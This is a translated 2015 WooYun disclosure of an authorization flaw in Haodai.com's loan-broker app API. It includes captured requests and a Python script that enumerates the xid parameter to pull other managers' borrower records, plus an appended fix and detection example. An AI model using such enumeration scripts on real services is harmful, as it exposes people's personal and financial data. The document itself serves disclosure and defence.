Vulnerability Summary

Defect ID: wooyun-2015-0148530

Title: Haodai.com (好贷网) allows unauthorized access to all orders and customer information of every credit manager (including name, mobile number, loan amount, property, etc.)

Vendor: 好贷网 (haodai.com)

Author: 路人甲

Submitted: 2015-10-22 02:15

Fixed: 2015-12-07 10:44

Published: 2015-12-07 10:44

Vulnerability type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help contact [email protected]


Vulnerability Details

Disclosure status:

2015-10-22: Details sent to the vendor, awaiting vendor action
2015-10-23: Vendor confirmed; details visible to the vendor only
2015-11-02: Details opened to core white hats and relevant domain experts
2015-11-12: Details opened to regular white hats
2015-11-22: Details opened to intern white hats
2015-12-07: Details opened to the public

Summary:

Financial P2P security: privilege bypass in the app

Details:

Target: the Haodai.com app 信贷圈 (credit manager app)
Register as a credit manager and log in; the following request returns the logged-in manager's own credit orders:

POST http://interface.api.haodai.com/bapi/OrderDeal/getOrderList HTTP/1.1
Host: interface.api.haodai.com
Cookie2: $Version=1
Cookie: PHPSESSID=fu1q3oiq4r4d70adoeee6bkj30
Accept-Encoding: identity
Content-Length: 197
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
os_type=1&appid=1&imei=A0000038000000&app_version=28002&auth_tms=20151022003047&auth_did=74590&auth_dsig=5389c584d321d88b&auth_uid=230822&auth_usig=b733c47d9df4a4c5&xid=221322&p=0&pg_size=20&type=0


My account has no customers, so details is returned as an empty list []:

{"rs_code":1000,"rs_msg":"","details":[],"pin_id":0,"t":1445445572,"d":"2015-10-22 00:39:32","td":"20151022003932"}


Here, xid in the POST body is the id of the manager being queried, and the server never checks that it matches the logged-in user; simply enumerating xid shows other managers' order information.
Based on this, I wrote a Python script to batch the queries. Here it only queries ids between 220821 and 221821:

#!/usr/bin/env python
#coding=utf8
# Python 2 script (httplib, unichr, print statement), as posted in the report.
import httplib, urllib, re, time

def Unicode_de(op):
    # Decode "\uXXXX" escapes in the JSON body so Chinese names print readably.
    while re.search(r'\\u[0-9a-fA-F]{4}', op):
        uni = re.search(r'\\u[0-9a-fA-F]{4}', op).group()
        uni_asc = uni.replace('\\u', '')
        try:
            uni_new = unichr(int(uni_asc, 16))
        except:
            break
        op = op.replace(uni, uni_new)
    return op

httpClient = None
for userid in range(220821, 221821):
    try:
        # Same body as the captured request; only xid (the manager being queried) changes.
        params = 'os_type=1&appid=1&imei=A0000038000000&app_version=28002&auth_tms=20151022003047&auth_did=74590&auth_dsig=5389c584d321d88b&auth_uid=230822&auth_usig=b733c47d9df4a4c5&xid=' + str(userid) + '&p=0&pg_size=20&type=0'
        headers = {"Host": "interface.api.haodai.com",
                   "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
                   "Accept-Encoding": "identity",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                   "Cookie": "PHPSESSID=fu1q3oiq4r4d70adoeee6bkj30",
                   "Cookie2": "$Version=1",
                   "Connection": "keep-alive",
                   "Content-Type": "application/x-www-form-urlencoded",
                   "Content-Length": 197}
        # Requests are sent through a local intercepting proxy (192.168.222.202:8080).
        httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=30)
        httpClient.request("POST", "http://interface.api.haodai.com/bapi/OrderDeal/getOrderList", params, headers)

        response = httpClient.getresponse()
        rp = response.read()
        # A non-empty details list contains order ids ("oid"); print those rows only.
        if re.search('oid', rp, re.I):
            print "信贷经理id:", userid, "订单信息:", re.search('details.*}]', Unicode_de(rp), re.I).group()
    except Exception, e:
        print e
    finally:
        if httpClient:
            httpClient.close()


Output:

[Figure: dd总.jpg]

Each row in the figure is one credit manager. The first red box is each manager's ID; the second red box holds that manager's orders and borrower information, including name, mobile number, loan amount, property, etc. Because each row carries too much data, only the first credit manager in the figure (first row, ID 220832) is expanded, in the next figure:

[Figure: dd分.jpg]

For space reasons the other rows are not expanded.
Likewise, the following request retrieves a credit manager's customers:

POST http://interface.api.haodai.com/bapi/OrderDeal/getOrderList HTTP/1.1
Host: interface.api.haodai.com
Cookie2: $Version=1
Cookie: PHPSESSID=8gfnnl3f8u7dmfolgdqt2tj146
Accept-Encoding: identity
Content-Length: 205
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
os_type=1&appid=1&imei=A0000038000000&app_version=28002&auth_tms=20151022000846&auth_did=74590&auth_dsig=9427c1e80249cd65&auth_uid=230822&auth_usig=9a1cef0f9777cbb2&xid=221146&p=0&pg_size=2147483647&type=1


Modifying xid in the same way enumerates the customer information of every credit manager, including name, mobile number, loan amount, property, etc.

[Figure: 订单信息总.jpg]

[Figure: 单据分.jpg]

Financial security concerns people's assets, so I did not dig into any other data.
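As an added example that is not part of the original report or of Haodai's own code: a model of the getOrderList handler with the missing ownership check beside a fixed form, plus a check over constructed request logs for the xid-enumeration pattern described above. ORDERS, the log line format and the rs_code 4030 error are assumptions for illustration.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample store: orders keyed by the credit manager (xid) that owns them.
# Customer names are placeholders; 230822 mirrors the reporter's own empty account.
ORDERS = {
    230822: [],
    220832: [{"oid": 1, "name": "<customer>", "amount": 50000}],
    221146: [{"oid": 2, "name": "<customer>", "amount": 120000}],
}

def get_order_list_vulnerable(session_uid, body):
    """Reported behaviour: whichever xid the client sends is looked up as-is."""
    xid = int(parse_qs(body)["xid"][0])
    return {"rs_code": 1000, "rs_msg": "", "details": ORDERS.get(xid, [])}

def get_order_list_fixed(session_uid, body):
    """Fix: the queried manager id must equal the authenticated user's id.
    (rs_code 4030 is an assumed error code, not one from the real API.)"""
    xid = int(parse_qs(body)["xid"][0])
    if xid != session_uid:
        return {"rs_code": 4030, "rs_msg": "forbidden", "details": []}
    return {"rs_code": 1000, "rs_msg": "", "details": ORDERS.get(xid, [])}

def find_enumerating_sessions(log_lines, threshold=5):
    """Detection: sessions whose requests target many distinct xid values
    other than their own auth_uid, the signature of the loop in the report."""
    targets = defaultdict(set)
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split())
        if fields["xid"] != fields["auth_uid"]:
            targets[fields["sess"]].add(fields["xid"])
    return sorted(s for s, xids in targets.items() if len(xids) >= threshold)

# Constructed access-log lines (assumed format): session, authenticated uid, requested xid.
SAMPLE_LOG = ["sess=normal auth_uid=230822 xid=230822"] + [
    "sess=scan auth_uid=230822 xid=%d" % x for x in range(220821, 220831)
]

if __name__ == "__main__":
    body = "auth_uid=230822&xid=220832&p=0&pg_size=20&type=0"
    print(get_order_list_vulnerable(230822, body)["details"])  # another manager's orders leak
    print(get_order_list_fixed(230822, body)["rs_code"])       # 4030: denied
    print(find_enumerating_sessions(SAMPLE_LOG))               # ['scan']
```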

Proof of vulnerability:

Fix recommendation:

Please advise.

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-23 10:43

Vendor reply:

Thanks.

Latest status:

None yet.